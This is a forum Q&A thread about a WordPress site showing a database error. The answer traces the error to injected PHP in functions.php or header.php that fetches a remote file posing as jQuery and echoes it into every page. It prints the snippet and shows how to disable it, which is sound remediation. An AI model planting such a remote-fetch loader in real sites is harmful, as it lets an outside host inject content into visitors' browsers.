: SQL statscurl_id Error using Wordpress I get this error at the bottom of my home page. please let me know why this error appeared in my website. I am running my website on wordpress. Here is
I get this error at the bottom of my home page. please let me know why this error appeared in my website.
I am running my website on wordpress.
Here is the error
Couldn't connect to database server.Couldn't find database cjquery.An unexpected problem has occured with the application.
SELECT statscurl_id FROM `statscurl` WHERE statscurl_ip = '';
More posts by @Caterina187
1 Comments
Sorted by latest first Latest Oldest Best
Login to the WordPress dashboard
Click appearance and then editor
Look in functions.php or header.php for the code below:
SOURCE
<?php
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
Remove the code or comment it out so it looks something like this:
<?php
// if(function_exists('curl_init'))
// {
// $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
// $ch = curl_init();
// $timeout = 5;
// curl_setopt($ch,CURLOPT_URL,$url);
// curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
// curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
// $data = curl_exec($ch);
// curl_close($ch);
// echo "$data";
//}
?>
The above string can vary from site to site.
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.